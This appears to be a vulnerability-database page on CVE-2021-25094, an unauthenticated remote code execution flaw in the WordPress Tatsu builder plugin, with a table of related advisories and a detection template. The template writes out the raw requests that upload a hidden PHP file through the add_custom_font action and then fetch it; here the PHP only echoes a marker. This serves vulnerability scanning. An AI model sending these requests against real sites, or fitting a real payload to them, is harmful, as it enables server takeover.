| Reporter | Title | Published | Views | Family All 27 |
|---|---|---|---|---|
| Mephisto | 21 May 202605:06 | – | githubexploit | |
| Exploit for Missing Authentication for Critical Function in Brandexponents Tatsu | 3 Jan 202221:19 | – | githubexploit | |
| CVE-2021-25094 | 25 Apr 202200:00 | – | attackerkb | |
| The vulnerability of the `add_custom_font` function in the Tatsu Builder template editing plugin for WordPress website content management system allows a hacker to execute arbitrary code. | 7 Jun 202200:00 | – | bdu_fstec | |
| CVE-2021-25094 | 17 May 202212:00 | – | circl | |
| WordPress plugin Tatsu 访问控制错误漏洞 | 25 Apr 202200:00 | – | cnnvd | |
| WordPress Tatsu plugin file upload vulnerability | 27 Apr 202200:00 | – | cnvd | |
| WordPress Tatsu Plugin Remote Code Execution (CVE-2021-25094) | 30 May 202200:00 | – | checkpoint_advisories | |
| CVE-2021-25094 | 25 Apr 202215:50 | – | cve | |
| CVE-2021-25094 Tatsu < 3.3.12 - Unauthenticated RCE | 25 Apr 202215:50 | – | cvelist |
id: CVE-2021-25094
info:
name: Wordpress Tatsubuilder <= 3.3.11 - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
An unrestricted file upload in WordPress Tatsubuilder plugin version <= 3.3.11 enables an unauthenticated attacker to perform a remote code execution (RCE) on the server host due to multiple weaknesses in the font import feature and put 100,000 websites at risk.
impact: |
Unauthenticated attackers can upload malicious PHP files via the font import feature, achieving remote code execution and complete server compromise.
remediation: Fixed in 3.3.12
reference:
- https://darkpills.com/wordpress-tatsu-builder-preauth-rce-cve-2021-25094/
- https://wpscan.com/vulnerability/fb0097a0-5d7b-4e5b-97de-aacafa8fffcd/
- https://nvd.nist.gov/vuln/detail/CVE-2021-25094
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2021-25094
cwe-id: CWE-306
epss-score: 0.83535
epss-percentile: 0.9965
cpe: cpe:2.3:a:brandexponents:tatsu:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 2
verified: true
publicwww-query: "/wp-content/plugins/tatsu/"
tags: cve,cve2021,wp,wp-plugin,wordpress,tatsu,rce,vkev,vuln
variables:
marker: "{{randstr}}"
b64marker: "{{base64(marker)}}"
filename: "{{rand_base(5)}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=a8bfdd88f26f754c25496d0dd4962d38
--a8bfdd88f26f754c25496d0dd4962d38
Content-Disposition: form-data; name="action"
add_custom_font
--a8bfdd88f26f754c25496d0dd4962d38
Content-Disposition: form-data; name="file"; filename="{{filename}}.zip"
{{zip('.{{filename}}.php','<?php echo base64_decode(\'{{b64marker}}\'); ?>')}}
--a8bfdd88f26f754c25496d0dd4962d38--
matchers:
- type: word
part: body
words:
- '"name":"{{to_lower(filename)}}"'
- '"status":"success'
condition: and
internal: true
- raw:
- |
GET /wp-content/uploads/typehub/custom/{{to_lower(filename)}}/.{{filename}}.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- '{{marker}}'
# digest: 490a0046304402203644f699c2f16d911e61829d0fa8ee74e63c1c0f85866b61d11df67d9fd4a117022046c73d51c12aa6bdac89c7814ae6aee41dc3d02320d9afaf80460b2d08dd05f5:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation